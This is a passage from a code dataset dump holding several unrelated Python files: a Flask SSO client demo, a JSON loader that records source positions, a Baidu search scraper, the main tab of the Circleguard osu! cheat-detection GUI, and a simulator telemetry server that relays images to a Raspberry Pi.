self.close()\n\n","sub_path":"mmlsharedb_sqlite.py","file_name":"mmlsharedb_sqlite.py","file_ext":"py","file_size_in_byte":10019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"523826495","text":"from urllib.parse import urlencode, urljoin\n\nimport flask\n\nimport requests\n\napp = flask.Flask(__name__)\n\nAUTHORIZE_URL = 'http://127.0.0.1:5000/sso/authorize'\nEXCHANGE_TOKEN_URL = 'http://127.0.0.1:5000/sso/exchange_token'\nAPI_PROFILE_URL = 'http://127.0.0.1:5000/api/user/profile'\nAPP_ID = 
'TESTAPP'\nAPP_SECRET = 'APPSECRET'\n\n\n@app.route('/')\ndef index():\n    qs = urlencode({\n        'app_id': APP_ID,\n        'redirect_uri': flask.url_for('callback', _external=True),\n        'scope': 'read,write',\n    })\n    auth_url = '%s?%s' % (AUTHORIZE_URL, qs)\n\n    access_token = flask.request.cookies.get('access_token')\n    if not access_token:\n        return '<a href=\"%s\">Authorize</a>' % auth_url\n    else:\n        headers = {'Authorization': access_token}\n        r = requests.get(API_PROFILE_URL, headers=headers)\n        body = r.json()\n        if r.status_code != 200:\n            return '''\n            Authorization failed (Reason: %s) <a href=\"%s\">Authorize</a>\n            ''' % (body['error_msg'], auth_url)\n\n        return 'Hello, %s! <a href=\"%s\">Logout</a>' % (\n            body['user_name'], flask.url_for('logout'))\n\n\n@app.route('/logout')\ndef logout():\n    resp = flask.make_response(flask.redirect(flask.url_for('index')))\n    resp.set_cookie('access_token', '', expires=0)\n    return resp\n\n\n@app.route('/sso/callback')\ndef callback():\n    auth_token = flask.request.args.get('auth_token')\n    data = {\n        'app_secret': APP_SECRET,\n        'auth_token': auth_token,\n    }\n    r = requests.post(EXCHANGE_TOKEN_URL, data=data)\n    body = r.json()\n    if r.status_code != 200:\n        return 'Authorization failed (Reason: %s)' % body['error_msg'], 400\n\n    resp = flask.make_response(flask.redirect(flask.url_for('index')))\n    resp.set_cookie('access_token', body['access_token'], httponly=True)\n\n    return resp\n","sub_path":"client/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
{"seq_id":"467743578","text":"# Copyright (c) 2015 Riverbed Technology, Inc.\n#\n# This software is licensed under the terms and conditions of the MIT License\n# accompanying the software (\"License\"). This software is distributed \"AS IS\"\n# as set forth in the License.\n\nimport json\nfrom collections import OrderedDict\n\nfrom yaml.error import Mark\nfrom json.scanner import py_make_scanner\nimport json.decoder\n\nfrom reschema.loader_nodes import ordered_dict_node, list_node, unicode_node\n\n\ndef linecol(doc, pos):\n    # assume zero-indexed\n    lineno = doc.count('\\n', 0, pos)\n    if lineno == 0:\n        colno = pos - 1\n    else:\n        colno = pos - doc.rindex('\\n', 0, pos) - 1\n    return lineno, colno\n\n\nclass Decoder(json.decoder.JSONDecoder):\n    def __init__(self, name=\"\", *args, **kwargs):\n        super(Decoder, self).__init__(*args, **kwargs)\n\n        def wrap_obj_parser(parser, node_type):\n            def internal(o_and_start, *args, **kwargs):\n                o, start = o_and_start\n                r, end = parser(o_and_start, *args, **kwargs)\n\n                start_line, start_col = linecol(o, start)\n                end_line, end_col = linecol(o, end)\n                start_mark = Mark(name, start, start_line, start_col, o, start)\n                end_mark = Mark(name, end, end_line, end_col, o, start)\n\n                return node_type(r, start_mark, end_mark), end\n            return internal\n\n        def wrap_parser(parser, node_type):\n            def internal(o, start, *args, **kwargs):\n                r, end = parser(o, start, *args, **kwargs)\n\n                start_line, start_col = linecol(o, start)\n                end_line, end_col = linecol(o, end)\n                start_mark = Mark(name, start, start_line, start_col, o, start)\n                end_mark = Mark(name, end, end_line, end_col, o, start)\n\n                return node_type(r, start_mark, end_mark), end\n            return internal\n\n        self.parse_string = wrap_parser(self.parse_string, unicode_node)\n        self.parse_array = wrap_obj_parser(self.parse_array, list_node)\n        self.parse_object = wrap_obj_parser(self.parse_object,\n                                            ordered_dict_node)\n\n        # Not thread safe, but need to patch this for loading marks onto object\n        # keys.\n        
json.decoder.scanstring = self.parse_string\n\n # Need to hook the python scanner because the C scanner doesn't have\n # a hookable method to parse_string.\n self.scan_once = py_make_scanner(self)\n\n\ndef marked_load(stream):\n return json.load(stream, cls=Decoder, name=stream.name)\n\n\ndef clean_load(stream):\n return json.load(stream, object_pairs_hook=OrderedDict)\n","sub_path":"reschema/json_loader.py","file_name":"json_loader.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"280093253","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@author : DTennant(dtennant.github.io)\n\"\"\"\nimport webbrowser,urllib,urllib2,sys\nfrom bs4 import BeautifulSoup\n\ndef handle_error(word):\n\tprint(word)\n\ndef browser_get_result(url):\n\twebbrowser.open_new_tab(url)\n\ndef usage():\n\tprint('''\n\t\tUsage:\n\t\t\tPydu.py keyword\n\t\t''')\n\ndef main():\n\ttry:\n\t\tkeyword = str(sys.argv[1])\n\t\tres_num = int(raw_input(\"\\nEnter The number of the results you want to search:\\n\"))\n\t\tres = urllib2.urlopen('http://www.baidu.com/s?' + urllib.urlencode({'wd': keyword}))\n\t\thtml = res.read()\n\t\tsoup = BeautifulSoup(html,'lxml')\n\t\tsearch_res = soup.find_all('div',class_ = 'result c-container ',limit = res_num)\n\t\tfor index in range(res_num):\n\t\t\tprint('search_res ready to load')\n\t\t\ttemp = search_res[index]\n\t\t\tprint('search_res readed')\n\t\t\tprint('Result No.' + str(index + 1) + ':\\n')\n\t\t\tprint('\\t' + temp.find('a').renderContents() + '\\n')\n\t\t\ta_click = temp.find('div',class_ = 'c-abstract')\n\t\t\tprint('\\t' + str(a_click.renderContents()) + '\\n')\n\n\t\tchoice = int(raw_input('\\nEnter The index of which result you want read(0 to quit):\\n'))\n\t\tif choice == 0:\n\t\t\texit()\n\t\tbrowser_get_result(str(search_res[choice - 1].find('a').get('href')))\n\n\texcept IndexError:\n\t\tusage()\n\texcept urllib2.URLError:\n\t\thandle_error('\\nCan\\'t connect the Internet,Please check the connect\\n')\n\nif __name__ == '__main__':\n\tmain()","sub_path":"Pydu/Pydu.py","file_name":"Pydu.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"323768651","text":"from queue import Queue, Empty\nimport threading\nfrom datetime import datetime\nimport sys\nimport math\nimport time\nfrom functools import partial\nimport logging\n\nfrom PyQt5.QtCore import *\nfrom PyQt5.QtWidgets import *\nfrom PyQt5.QtGui import *\nfrom circleguard import *\nfrom slider import Library\nfrom circlevis import BeatmapInfo\n\nfrom widgets import (ReplayMapW, ReplayPathW, MapW, UserW, MapUserW,\n ScrollableLoadablesWidget, ScrollableChecksWidget, StealCheckW, RelaxCheckW,\n CorrectionCheckW, TimewarpCheckW, AnalyzeW)\nfrom settings import SingleLinkableSetting, get_setting\nfrom utils import delete_widget, AnalysisResult\nfrom .visualizer import CGVisualizer\n\n\nlog = logging.getLogger(__name__)\n\nclass MainTab(SingleLinkableSetting, QFrame):\n set_progressbar_signal = pyqtSignal(int) # max progress\n increment_progressbar_signal = pyqtSignal(int) # increment value\n update_label_signal = pyqtSignal(str)\n write_to_terminal_signal = pyqtSignal(str)\n add_result_signal = pyqtSignal(object) # Result\n add_run_to_queue_signal = pyqtSignal(object) # Run object (or a subclass)\n update_run_status_signal = pyqtSignal(int, str) # run_id, status_str\n print_results_signal = pyqtSignal() # called after a run finishes to 
flush the results queue before printing \"Done\"\n\n LOADABLES_COMBOBOX_REGISTRY = [\"Add a Loadable\", \"+ Map Replay\", \"+ Local Replay\", \"+ Map\", \"+ User\", \"+ All User Replays on Map\"]\n CHECKS_COMBOBOX_REGISTRY = [\"Add a Check\", \"+ Replay Stealing\", \"+ Relax\", \"+ Aim Correction\", \"+ Timewarp\", \"+ Manual Analysis\"]\n\n def __init__(self):\n QFrame.__init__(self)\n SingleLinkableSetting.__init__(self, \"api_key\")\n\n self.library = Library(get_setting(\"cache_dir\"))\n\n self.loadables_combobox = QComboBox(self)\n self.loadables_combobox.setInsertPolicy(QComboBox.NoInsert)\n for loadable in MainTab.LOADABLES_COMBOBOX_REGISTRY:\n self.loadables_combobox.addItem(loadable, loadable)\n self.loadables_combobox.activated.connect(self.add_loadable)\n\n self.checks_combobox = QComboBox(self)\n self.checks_combobox.setInsertPolicy(QComboBox.NoInsert)\n for check in MainTab.CHECKS_COMBOBOX_REGISTRY:\n self.checks_combobox.addItem(check, check)\n self.checks_combobox.activated.connect(self.add_check)\n\n self.loadables_scrollarea = QScrollArea(self)\n self.loadables_scrollarea.setWidget(ScrollableLoadablesWidget())\n self.loadables_scrollarea.setWidgetResizable(True)\n\n self.checks_scrollarea = QScrollArea(self)\n self.checks_scrollarea.setWidget(ScrollableChecksWidget())\n self.checks_scrollarea.setWidgetResizable(True)\n\n self.loadables = [] # for deleting later\n self.checks = [] # for deleting later\n\n self.print_results_signal.connect(self.print_results)\n self.write_to_terminal_signal.connect(self.write)\n\n self.q = Queue()\n self.cg_q = Queue()\n self.helper_thread_running = False\n self.runs = [] # Run objects for canceling runs\n self.run_id = 0\n self.visualizer = None\n\n terminal = QTextEdit(self)\n terminal.setFocusPolicy(Qt.ClickFocus)\n terminal.setReadOnly(True)\n terminal.ensureCursorVisible()\n self.terminal = terminal\n\n self.run_button = QPushButton()\n self.run_button.setText(\"Run\")\n self.run_button.clicked.connect(self.add_circleguard_run)\n # disable button if no api_key is stored\n self.on_setting_changed(\"api_key\", get_setting(\"api_key\"))\n\n layout = QGridLayout()\n layout.addWidget(self.loadables_combobox, 0, 0, 1, 4)\n layout.addWidget(self.checks_combobox, 0, 8, 1, 4)\n layout.addWidget(self.loadables_scrollarea, 1, 0, 4, 8)\n layout.addWidget(self.checks_scrollarea, 1, 8, 4, 8)\n layout.addWidget(self.terminal, 5, 0, 2, 16)\n layout.addWidget(self.run_button, 7, 0, 1, 16)\n\n self.setLayout(layout)\n\n def on_setting_changed(self, setting, text):\n self.run_button.setEnabled(text != \"\")\n\n # am well aware that there's much duplicated code between remove_loadable,\n # remove_check, add_loadable, and add_check. 
Don't feel like writing\n    # more generic functions for them right now.\n    def remove_loadable(self, loadable_id):\n        # should only ever be one occurrence, a comp + index works well enough\n        loadables = [l for l in self.loadables if l.loadable_id == loadable_id]\n        if not loadables: # sometimes an empty list; I don't know how, since you need a loadable to click the delete button...\n            return\n        loadable = loadables[0]\n        self.loadables_scrollarea.widget().layout.removeWidget(loadable)\n        delete_widget(loadable)\n        self.loadables.remove(loadable)\n        # remove deleted loadables from Checks as well\n        for check in self.checks:\n            check.remove_loadable(loadable_id)\n\n    def remove_check(self, check_id):\n        # see above method for comments\n        checks = [c for c in self.checks if c.check_id == check_id]\n        if not checks:\n            return\n        check = checks[0]\n        self.checks_scrollarea.widget().layout.removeWidget(check)\n        delete_widget(check)\n        self.checks.remove(check)\n\n    def add_loadable(self):\n        # don't do anything if they selected the default text\n        if self.loadables_combobox.currentIndex() == 0:\n            return\n        button_data = self.loadables_combobox.currentData()\n        # go back to default text\n        self.loadables_combobox.setCurrentIndex(0)\n        if button_data == \"+ Map Replay\":\n            w = ReplayMapW()\n        if button_data == \"+ Local Replay\":\n            w = ReplayPathW()\n        if button_data == \"+ Map\":\n            w = MapW()\n        if button_data == \"+ User\":\n            w = UserW()\n        if button_data == \"+ All User Replays on Map\":\n            w = MapUserW()\n        w.remove_loadable_signal.connect(self.remove_loadable)\n        self.loadables_scrollarea.widget().layout.addWidget(w)\n        self.loadables.append(w)\n\n    def add_check(self):\n        if self.checks_combobox.currentIndex() == 0:\n            return\n        button_data = self.checks_combobox.currentData()\n        self.checks_combobox.setCurrentIndex(0)\n        if button_data == \"+ Replay Stealing\":\n            w = StealCheckW()\n        if button_data == \"+ Relax\":\n            w = RelaxCheckW()\n        if button_data == \"+ Aim Correction\":\n            w = CorrectionCheckW()\n        if button_data == \"+ Timewarp\":\n            w = TimewarpCheckW()\n        if button_data == \"+ Manual Analysis\":\n            w = AnalyzeW()\n        w.remove_check_signal.connect(self.remove_check)\n        self.checks_scrollarea.widget().layout.addWidget(w)\n        self.checks.append(w)\n\n    def write(self, message):\n        self.terminal.append(str(message).strip())\n        self.scroll_to_bottom()\n\n    def scroll_to_bottom(self):\n        cursor = QTextCursor(self.terminal.document())\n        cursor.movePosition(QTextCursor.End)\n        self.terminal.setTextCursor(cursor)\n\n    def add_circleguard_run(self):\n        checks = self.checks\n        if not checks:\n            return\n        for check in checks:\n            # all loadable objects in this check\n            # (the check only stores the loadable ids, not the objects themselves)\n            # TODO\n            # this is a ridiculous way to do it, but the alternative would involve serializing\n            # the class into a QByteArray and passing it through the QMimeData of the QDrag,\n            # then converting it back to a class on the other side, so we'll stick with this for now.\n\n            # aka ``isinstance(check, StealCheckW)``\n            if check.double_drop_area:\n                loadables1 = [l for l in self.loadables if l.loadable_id in check.drop_area1.loadable_ids]\n                loadables2 = [l for l in self.loadables if l.loadable_id in check.drop_area2.loadable_ids]\n                check.loadables1 = loadables1\n                check.loadables2 = loadables2\n            else:\n                loadables = [l for l in self.loadables if l.loadable_id in check.all_loadable_ids()]\n                check.loadables = loadables\n\n        # would use any() but it short-circuits and doesn't call on all loadables\n        all_filled = True\n        for check in checks:\n            
for loadable in check.all_loadables():\n                # don't assign to all_filled if all_filled is already False\n                all_filled = loadable.check_required_fields() if all_filled else all_filled\n\n        if not all_filled:\n            # no more feedback necessary like printing to console (probably)\n            # because the check_required_fields method already highlights\n            # empty QLineEdits in red\n            return\n        checks = [check for check in checks if check.all_loadables()]\n        if not checks:\n            # loadables haven't been dragged to any of the checks, just return\n            # so we don't have prints to the console for no reason\n            return\n\n        run = Run(checks, self.run_id, threading.Event())\n        self.runs.append(run)\n        self.add_run_to_queue_signal.emit(run)\n        self.cg_q.put(run)\n        self.run_id += 1\n\n        # called every 1/4 seconds by timer, but force a recheck to not wait for that delay\n        self.check_circleguard_queue()\n\n\n    def check_circleguard_queue(self):\n        def _check_circleguard_queue(self):\n            try:\n                while True:\n                    run = self.cg_q.get_nowait()\n                    # occurs if run is canceled before being started, it will still stop\n                    # before actually loading anything but we don't want the labels to flicker\n                    if run.event.wait(0):\n                        continue\n                    thread = threading.Thread(target=self.run_circleguard, args=[run])\n                    self.helper_thread_running = True\n                    thread.start()\n                    # run sequentially to not confuse user with terminal output\n                    thread.join()\n            except Empty:\n                self.helper_thread_running = False\n                return\n\n        # don't launch another thread running cg if one is already running,\n        # or else multiple runs will occur at once (defeats the whole purpose\n        # of sequential runs)\n        if not self.helper_thread_running:\n            # have to use a second helper thread: if we start the threads in\n            # the main thread and .join, it will block the gui thread (very bad).\n            thread = threading.Thread(target=_check_circleguard_queue, args=[self])\n            thread.start()\n\n\n\n    def run_circleguard(self, run):\n        self.update_label_signal.emit(\"Loading Replays\")\n        self.update_run_status_signal.emit(run.run_id, \"Loading Replays\")\n        event = run.event\n        try:\n            core_cache = get_setting(\"cache_dir\") + \"circleguard.db\"\n            slider_cache = get_setting(\"cache_dir\")\n            should_cache = get_setting(\"caching\")\n            cg = Circleguard(get_setting(\"api_key\"), core_cache, slider_dir=slider_cache, cache=should_cache, loader=TrackerLoader)\n            def _ratelimited(length):\n                message = get_setting(\"message_ratelimited\")\n                ts = datetime.now()\n                self.write_to_terminal_signal.emit(message.format(s=length, ts=ts))\n                self.update_label_signal.emit(\"Ratelimited\")\n                self.update_run_status_signal.emit(run.run_id, \"Ratelimited\")\n            def _check_event(event):\n                \"\"\"\n                Checks the given event to see if it is set. If it is, the run has been canceled\n                through the queue tab or by the application being quit, and this thread exits\n                through sys.exit(0). 
If the event is not set, returns silently.\n                \"\"\"\n                if event.wait(0):\n                    self.update_label_signal.emit(\"Canceled\")\n                    self.set_progressbar_signal.emit(-1)\n                    # may seem dirty, but actually relatively clean since it only affects this thread.\n                    # Any cleanup we may want to do later can occur here as well\n                    sys.exit(0)\n\n            cg.loader.ratelimit_signal.connect(_ratelimited)\n            cg.loader.check_stopped_signal.connect(partial(_check_event, event))\n\n            # aggregate loadables from all of the checks so we don't create\n            # separate instances per check and double load the (otherwise)\n            # identical loadable\n\n            # discard duplicate loadableWs\n            loadableWs = {loadableW for checkW in run.checks for loadableW in checkW.all_loadables()}\n            # mapping of loadableW id to loadable object so each check can\n            # replace its loadableWs with the same loadable object and avoid\n            # double loading\n            loadableW_id_to_loadable = {}\n\n            for loadableW in loadableWs:\n                loadable = None\n                try:\n                    if isinstance(loadableW, ReplayPathW):\n                        if loadableW.path_input.path.is_dir():\n                            loadable = ReplayDir(loadableW.path_input.path)\n                        else:\n                            loadable = ReplayPath(loadableW.path_input.path)\n                    if isinstance(loadableW, ReplayMapW):\n                        # Mod init errors on empty string, so just assign None\n                        mods = Mod(loadableW.mods_input.value()) if loadableW.mods_input.value() else None\n                        loadable = ReplayMap(int(loadableW.map_id_input.value()), int(loadableW.user_id_input.value()), mods=mods)\n                    if isinstance(loadableW, MapW):\n                        mods = Mod(loadableW.mods_input.value()) if loadableW.mods_input.value() else None\n                        # use placeholder text (1-50) if the user inputted span is empty\n                        span = loadableW.span_input.value() or loadableW.span_input.field.placeholderText()\n                        if span == \"all\":\n                            span = \"1-100\"\n                        loadable = Map(int(loadableW.map_id_input.value()), span=span, mods=mods)\n                    if isinstance(loadableW, UserW):\n                        mods = Mod(loadableW.mods_input.value()) if loadableW.mods_input.value() else None\n                        span = loadableW.span_input.value()\n                        if span == \"all\":\n                            span = \"1-100\"\n                        loadable = User(int(loadableW.user_id_input.value()), span=span, mods=mods)\n                    if isinstance(loadableW, MapUserW):\n                        span = loadableW.span_input.value() or loadableW.span_input.field.placeholderText()\n                        if span == \"all\":\n                            span = \"1-100\"\n                        loadable = MapUser(int(loadableW.map_id_input.value()), int(loadableW.user_id_input.value()), span=span)\n                    loadableW_id_to_loadable[loadableW.loadable_id] = loadable\n                except ValueError as e:\n                    self.write_to_terminal_signal.emit(str(e))\n                    self.update_label_signal.emit(\"Invalid arguments\")\n                    self.update_run_status_signal.emit(run.run_id, \"Invalid arguments\")\n                    self.set_progressbar_signal.emit(-1)\n                    sys.exit(0)\n\n            for checkW in run.checks:\n                d = None\n                check_type = None\n                max_angle = None\n                min_distance = None\n                if isinstance(checkW, StealCheckW):\n                    check_type = \"Steal\"\n                    d = Detect.STEAL\n                if isinstance(checkW, RelaxCheckW):\n                    check_type = \"Relax\"\n                    d = Detect.RELAX\n                if isinstance(checkW, CorrectionCheckW):\n                    max_angle = get_setting(\"correction_max_angle\")\n                    min_distance = get_setting(\"correction_min_distance\")\n                    check_type = \"Aim Correction\"\n                    d = Detect.CORRECTION\n                if isinstance(checkW, TimewarpCheckW):\n                    check_type = \"Timewarp\"\n                    d = Detect.TIMEWARP\n                if isinstance(checkW, AnalyzeW):\n                    d = Detect(0) # don't run any detection\n                    check_type = \"Visualization\"\n                # retrieve loadable objects from loadableW ids\n                if isinstance(checkW, StealCheckW):\n                    loadables1 = [loadableW_id_to_loadable[loadableW.loadable_id] for loadableW in 
checkW.loadables1]\n                    loadables2 = [loadableW_id_to_loadable[loadableW.loadable_id] for loadableW in checkW.loadables2]\n                    c = Check(loadables1, cache=None, loadables2=loadables2)\n                else:\n                    loadables = [loadableW_id_to_loadable[loadableW.loadable_id] for loadableW in checkW.loadables]\n                    c = Check(loadables, cache=None)\n                message_loading_info = get_setting(\"message_loading_info\").format(ts=datetime.now(), check_type=check_type)\n                self.write_to_terminal_signal.emit(message_loading_info)\n                cg.load_info(c)\n                replays = c.all_replays()\n                # don't show \"loading 2 replays\" if they were already loaded\n                # by a previous check, would be misleading\n                num_unloaded = 0\n                num_total = len(c.all_replays())\n                for r in replays:\n                    if not r.loaded:\n                        num_unloaded += 1\n                if num_unloaded != 0:\n                    self.set_progressbar_signal.emit(num_unloaded)\n                else:\n                    self.set_progressbar_signal.emit(1)\n                num_loaded = num_total - num_unloaded\n                message_loading_replays = get_setting(\"message_loading_replays\").format(ts=datetime.now(),\n                    num_total=num_total, num_previously_loaded=num_loaded, num_unloaded=num_unloaded,\n                    check_type=check_type)\n                self.write_to_terminal_signal.emit(message_loading_replays)\n                for replay in replays:\n                    _check_event(event)\n                    cg.load(replay)\n                    self.increment_progressbar_signal.emit(1)\n                c.loaded = True\n                # change progressbar into an undetermined state (animation with\n                # stripes sliding horizontally) to indicate we're processing\n                # the data\n                self.set_progressbar_signal.emit(0)\n                setting = \"message_starting_investigation_analysis\" if isinstance(checkW, AnalyzeW) else \"message_starting_investigation\"\n                message_starting_investigation = get_setting(setting).format(ts=datetime.now(),\n                    num_total=num_total, num_previously_loaded=num_loaded, num_unloaded=num_unloaded,\n                    check_type=check_type)\n                self.write_to_terminal_signal.emit(message_starting_investigation)\n                if isinstance(checkW, AnalyzeW):\n                    map_ids = [r.map_id for r in replays]\n                    if len(set(map_ids)) != 1:\n                        self.write_to_terminal_signal.emit(f\"Visualizer expected replays from a single map, but got multiple {set(map_ids)}. Please use a different Visualizer Object for each map\")\n                        self.update_label_signal.emit(\"Visualizer Error (Multiple maps)\")\n                        self.update_run_status_signal.emit(run.run_id, \"Visualizer Error (Multiple maps)\")\n                        self.set_progressbar_signal.emit(-1)\n                        sys.exit(0)\n                    self.q.put(AnalysisResult(replays))\n                else:\n                    self.update_label_signal.emit(\"Investigating Replays\")\n                    self.update_run_status_signal.emit(run.run_id, \"Investigating Replays\")\n                    for result in cg.run(c.loadables1, d, c.loadables2, max_angle, min_distance):\n                        _check_event(event)\n                        self.q.put(result)\n                self.print_results_signal.emit() # flush self.q\n\n            self.set_progressbar_signal.emit(-1) # empty progressbar\n            # 'flush' self.q so there's no more results left and message_finished_investigation\n            # won't print before results from that investigation which looks strange.\n            # Signal instead of call to be threadsafe and avoid\n            # ```\n            # QObject::connect: Cannot queue arguments of type 'QTextCursor'\n            # (Make sure 'QTextCursor' is registered using qRegisterMetaType().)\n            # ```\n            # warning\n            self.print_results_signal.emit()\n            self.write_to_terminal_signal.emit(get_setting(\"message_finished_investigation\").format(ts=datetime.now()))\n            # prevents an error when a user closes the application. Because\n            # we're running inside a new thread, if we don't do this, cg (and\n            # the library) will get gc'd in another thread. 
Because library's\n # ``__del__`` closes the sqlite connection, this causes:\n # ```\n # Traceback (most recent call last):\n # File \"/Users/tybug/Desktop/coding/osu/slider/slider/library.py\", line 98, in __del__\n # self.close()\n # File \"/Users/tybug/Desktop/coding/osu/slider/slider/library.py\", line 94, in close\n # self._db.close()\n # sqlite3.ProgrammingError: SQLite objects created in a thread can only be used in that same thread.\n # The object was created in thread id 123145483210752 and this is thread id 4479481280.\n # ```\n cg.library.close()\n\n except NoInfoAvailableException:\n self.write_to_terminal_signal.emit(\"No information found for those arguments. Please check your inputs and make sure the given user/map exists\")\n self.set_progressbar_signal.emit(-1)\n\n except Exception:\n log.exception(\"Error while running circlecore. Please \"\n \"report this to the developers through discord or github.\\n\")\n\n self.update_label_signal.emit(\"Idle\")\n self.update_run_status_signal.emit(run.run_id, \"Finished\")\n\n def print_results(self):\n try:\n while True:\n result = self.q.get_nowait()\n ts = datetime.now() # ts = timestamp\n message = None\n ischeat = False\n if isinstance(result, StealResult):\n if result.similarity < get_setting(\"steal_max_sim\"):\n ischeat = True\n message = get_setting(\"message_steal_found\").format(ts=ts, sim=result.similarity, r=result, replay1=result.replay1, replay2=result.replay2,\n earlier_replay_mods_short_name=result.earlier_replay.mods.short_name(), earlier_replay_mods_long_name=result.earlier_replay.mods.long_name(),\n later_replay_mods_short_name=result.later_replay.mods.short_name(), later_replay_mods_long_name=result.later_replay.mods.long_name())\n elif result.similarity < get_setting(\"steal_max_sim_display\"):\n message = get_setting(\"message_steal_found_display\").format(ts=ts, sim=result.similarity, r=result, replay1=result.replay1,\n earlier_replay_mods_short_name=result.earlier_replay.mods.short_name(), earlier_replay_mods_long_name=result.earlier_replay.mods.long_name(),\n later_replay_mods_short_name=result.later_replay.mods.short_name(), later_replay_mods_long_name=result.later_replay.mods.long_name())\n\n if isinstance(result, RelaxResult):\n if result.ur < get_setting(\"relax_max_ur\"):\n ischeat = True\n message = get_setting(\"message_relax_found\").format(ts=ts, r=result, replay=result.replay, ur=result.ur,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n elif result.ur < get_setting(\"relax_max_ur_display\"):\n message = get_setting(\"message_relax_found_display\").format(ts=ts, r=result, replay=result.replay, ur=result.ur,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n\n if isinstance(result, CorrectionResult):\n if len(result.snaps) > 0:\n ischeat = True\n snap_message = get_setting(\"message_correction_snaps\")\n snap_text = \"\\n\".join([snap_message.format(time=snap.time, angle=snap.angle, distance=snap.distance) for snap in result.snaps])\n message = get_setting(\"message_correction_found\").format(ts=ts, r=result, replay=result.replay, snaps=snap_text,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n\n if isinstance(result, TimewarpResult):\n if result.frametime < get_setting(\"timewarp_max_frametime\"):\n ischeat = True\n message = get_setting(\"message_timewarp_found\").format(ts=ts, r=result, replay=result.replay, frametime=result.frametime,\n 
mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n elif result.frametime < get_setting(\"timewarp_max_frametime_display\"):\n message = get_setting(\"message_timewarp_found_display\").format(ts=ts, r=result, replay=result.replay, frametime=result.frametime,\n mods_short_name=result.replay.mods.short_name(), mods_long_name=result.replay.mods.long_name())\n\n # message is None if the result isn't a cheat and doesn't\n # satisfy its display threshold\n if message:\n self.write(message)\n if isinstance(result, AnalysisResult):\n self.add_result_signal.emit(result)\n else:\n if ischeat:\n QApplication.beep()\n QApplication.alert(self)\n # add to Results Tab so it can be played back on demand\n self.add_result_signal.emit(result)\n\n except Empty:\n pass\n\n def visualize(self, replays, beatmap_id, result):\n # only run one instance at a time\n if self.visualizer is not None:\n self.visualizer.close()\n snaps = []\n if isinstance(result, CorrectionResult):\n snaps = [snap.time for snap in result.snaps]\n beatmap_info = BeatmapInfo(map_id=beatmap_id)\n if not get_setting(\"render_beatmap\"):\n # don't give the visualizer any beatmap info if the user doesn't\n # want it rendered\n beatmap_info = BeatmapInfo()\n self.visualizer = CGVisualizer(beatmap_info, replays, snaps, self.library)\n self.visualizer.show()\n\n\nclass TrackerLoader(Loader, QObject):\n \"\"\"\n A circleguard.Loader subclass that emits a signal when the loader is ratelimited.\n It inherits from QObject to allow us to use qt signals.\n \"\"\"\n ratelimit_signal = pyqtSignal(int) # length of the ratelimit in seconds\n check_stopped_signal = pyqtSignal()\n # how often to emit check_stopped_signal when ratelimited, in seconds\n INTERVAL = 0.250\n\n def __init__(self, key, cacher=None):\n Loader.__init__(self, key, cacher)\n QObject.__init__(self)\n\n def _ratelimit(self, length):\n self.ratelimit_signal.emit(length)\n # how many times to wait for 1/4 second (rng standing for range)\n # we do this loop in order to tell run_circleguard to check if the run\n # was canceled, or the application quit, instead of hanging on a long\n # time.sleep\n rng = math.ceil(length / self.INTERVAL)\n for _ in range(rng):\n time.sleep(self.INTERVAL)\n self.check_stopped_signal.emit()\n\n\nclass Run():\n \"\"\"\n Represents a click of the Run button on the Main tab, which can contain\n multiple Checks, each of which contains a set of Loadables.\n \"\"\"\n def __init__(self, checks, run_id, event):\n self.checks = checks\n self.run_id = run_id\n self.event = event\n","sub_path":"circleguard/gui/main_tab.py","file_name":"main_tab.py","file_ext":"py","file_size_in_byte":28987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"129988650","text":"import base64\nimport json\nimport eventlet.wsgi\nimport numpy as np\nimport socketio\nimport grpc\n\n\nfrom PIL import Image\nfrom flask import Flask\nfrom io import BytesIO\nimport socket\n\nimport helper\n\nSEND_HOST = \"10.0.2.152\"\nSEND_PORT = 9999\n\nRECV_HOST = \"127.0.0.1\"\nRECV_PORT = 9999\n\nsio = socketio.Server()\napp = Flask(__name__)\nprev_image_array = None\n\n\nrecv_sock = socket.socket(socket.AF_INET)\nrecv_sock.bind((RECV_HOST, RECV_PORT))\nrecv_sock.listen(1)\nconnect, address = recv_sock.accept()\nprint(\"Raspberry Pi Connect By {}\".format(address))\n\nsend_sock = socket.socket(socket.AF_INET)\nsend_sock.connect((SEND_HOST, SEND_PORT))\n\n\n\ndef crop(image, top_cropping_percent):\n assert 0 <= 
top_cropping_percent < 1.0, 'top_cropping_percent should be between zero and one'\n percent = int(np.ceil(image.shape[0] * top_cropping_percent))\n return image[percent:, :, :]\n\n@sio.on('telemetry')\ndef telemetry(sid, data):\n global send_sock\n global recv_sock\n\n # The current steering angle of the car\n steering_angle = data[\"steering_angle\"]\n\n # The current throttle of the car\n throttle = data[\"throttle\"]\n\n # The current speed of the car\n speed = data[\"speed\"]\n\n # The current image from the center camera of the car\n imgString = data[\"image\"]\n image = Image.open(BytesIO(base64.b64decode(imgString)))\n image_array = np.asarray(image)\n\n image_array = helper.crop(image_array, 0.35, 0.1)\n image_array = helper.resize(image_array, new_dim=(64, 64))\n\n transformed_image_array = image_array[None, :, :, :]\n\n # Raspberry Pi\n # length is 16384 \n img_str = base64.b64encode(transformed_image_array)\n send_sock.sendall(img_str)\n data = connect.recv(1024)\n steering_angle = float(data)\n\n # The driving model currently just outputs a constant throttle. Feel free to edit this.\n throttle = 0.3\n\n print('{:.5f}, {:.1f}'.format(steering_angle, throttle))\n\n send_control(steering_angle, throttle)\n\n@sio.on('connect')\ndef connect(sid, environ):\n print(\"connect \", sid)\n send_control(0, 0)\n\ndef send_control(steering_angle, throttle):\n sio.emit(\"steer\", data={\n 